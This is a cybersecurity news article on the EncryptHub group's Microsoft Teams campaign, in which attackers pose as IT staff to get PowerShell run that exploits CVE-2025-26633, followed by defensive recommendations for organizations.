Redazione RHC : 17 August 2025 08:41
In recent years, Microsoft Teams has become one of the most popular collaboration tools within companies, transforming into a strategic channel not only for communication but also for managing documents, meetings, and operational processes.
This growing importance, however, has not gone unnoticed by cybercriminals, who are developing increasingly sophisticated attack and social engineering techniques on this platform, with the aim of infiltrating corporate networks and stealing sensitive information. The combination of implicit trust in the tool and the high volume of daily communications creates fertile ground for targeted compromise campaigns.
A prime example is the cutting-edge social engineering operation orchestrated by the malicious group EncryptHub, which deployed a perverse strategy capable of combining spoofing techniques with targeted technical exploits. As anticipated in yesterday’s analysis, this advanced campaign leverages impersonation tactics and cyber attack vectors, significantly compromising the security of corporate infrastructure.
This new approach, impersonating IT staff, demonstrates how the lines between social engineering and technical attacks are blurring, opening up increasingly complex scenarios for cyber defense.
The attack begins with threat actors claiming to be internal IT departments and sending Microsoft Teams connection requests to targeted employees.
Once victims accept the request and establish a remote session, the attackers guide them through the execution of PowerShell commands that appear legitimate but actually download and execute malicious scripts.
The initial command executed bypasses Windows security policies and downloads a PowerShell script named “runner.ps1” from attacker-controlled domains, such as cjhsbam[.]com.
This script is designed to exploit CVE-2025-26633, a vulnerability in Microsoft’s Management Console framework called “MSC EvilTwin.”
CVE-2025-26633 was officially disclosed as a zero-day vulnerability in March 2025, although examples of related attacks were observed in the wild as early as February 2025. Microsoft has since released security patches, but the vulnerability continues to be actively exploited against unpatched systems.
The vulnerability has a CVSS score of 7.0, indicating high severity, and has been added to CISA’s catalog of known exploited vulnerabilities, underscoring its critical nature for federal agencies and enterprise environments.
The campaign highlights the persistent effectiveness of social engineering attacks combined with technical exploitation. “Social engineering remains one of the most effective tools in a cybercriminal’s arsenal, and the emerging EncryptHub group has quickly joined this trend,” Trustwave researchers noted.
Cybersecurity experts recommend implementing multi-layered defense strategies, including the immediate remediation of CVE-2025-26633, advanced monitoring of Microsoft Management Console activity, and comprehensive user awareness training focused on social engineering tactics.
Organizations should also limit remote access capabilities and implement strict vetting procedures for interactions with IT support.
Redazione